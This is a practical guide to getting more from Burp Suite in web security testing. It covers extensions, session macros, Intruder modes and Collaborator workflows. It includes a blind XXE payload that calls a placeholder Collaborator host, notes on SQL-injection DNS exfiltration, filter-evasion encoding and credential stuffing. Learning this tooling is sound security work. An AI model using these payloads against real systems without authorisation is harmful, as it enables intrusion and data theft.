Getting More Out of Burp Suite: Tips, Extensions, and Workflows
Most people use maybe 20% of Burp Suite's capabilities. Here are the extensions, configurations, and workflows that will make you significantly more effective.
Essential extensions
Install these from the BApp Store before you do anything else:
- Autorize - Automated authorization testing. Configure it with a low-privilege session cookie and it replays every request with those credentials, flagging where access control is missing. Finds IDOR and privilege escalation issues with minimal effort.
- Param Miner - Discovers hidden parameters by bruteforcing parameter names against endpoints. Finds web cache poisoning vectors, hidden debug parameters, and undocumented functionality.
- Turbo Intruder - When regular Intruder is too slow. Python-scriptable HTTP fuzzer that can send thousands of requests per second. Essential for race conditions and high-speed brute forcing.
- Logger++ - Enhanced request/response logging with regex filtering. Much more powerful than Burp's built-in HTTP history for analyzing traffic patterns.
- ActiveScan++ - Extends the active scanner with additional checks for host header injection, cache poisoning, and other issues the default scanner misses.
- Hackvertor - Tag-based encoding/decoding directly in requests. Nest encoding operations:
<@base64><@url>payload<@/url><@/base64>. Invaluable for filter evasion. - JS Link Finder - Extracts endpoints and paths from JavaScript files. Discovers API endpoints that are not visible through normal browsing.
Session handling rules
Burp's session handling rules are underused and incredibly powerful. Configure them under Project Options > Sessions.
- Set up a macro that performs login and extracts a fresh token. Attach it to a session handling rule that triggers when Burp detects an invalid session (e.g., a 302 to /login or a specific error string in the response).
- For applications with CSRF tokens, create a macro that fetches a fresh token before each request. This keeps Intruder and Scanner working against CSRF-protected endpoints.
- Use cookie jar rules to manage multiple sessions simultaneously for authorization testing.
Intruder attack types
Most people only use Sniper mode. Learn the others:
- Sniper - One payload position at a time. Good for fuzzing individual parameters.
- Battering Ram - Same payload in all positions simultaneously. Useful when the same value needs to appear in multiple places (e.g., a value in both a parameter and a header).
- Pitchfork - Different payload lists for each position, iterated in parallel. Perfect for credential stuffing with username:password pairs.
- Cluster Bomb - All combinations of all payload lists. Combinatorial explosion warning - use small lists or you will be waiting forever.
Collaborator for blind testing
Burp Collaborator is your best friend for blind vulnerabilities:
- Blind SSRF - inject Collaborator URLs in any parameter that might trigger a server-side request
- Blind XXE - use Collaborator as an external DTD host
- Blind SQL injection - use DNS exfiltration via xp_dirtree or UTL_HTTP pointing to Collaborator
- Out-of-band XSS - Collaborator as the callback URL in stored payloads
# Blind XXE with Collaborator exfiltration
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "http://YOUR-COLLAB-ID.burpcollaborator.net/xxe">
]>
<root>&xxe;</root>
Workflow tips
- Always start by crawling with the browser, not the scanner. Manual browsing through a proxy gives you a better understanding of the application than any automated crawl.
- Use scope religiously. Define your target scope first and filter everything else out. Noise kills efficiency.
- Save project files frequently. Burp crashes happen. Losing hours of work is not fun.
- Use the search function across all tools (Edit > Find). It searches request/response history, which is invaluable for finding where specific tokens or values appear.
The PortSwigger Web Security Academy is the best free resource for learning to use Burp effectively in realistic scenarios. Work through the labs.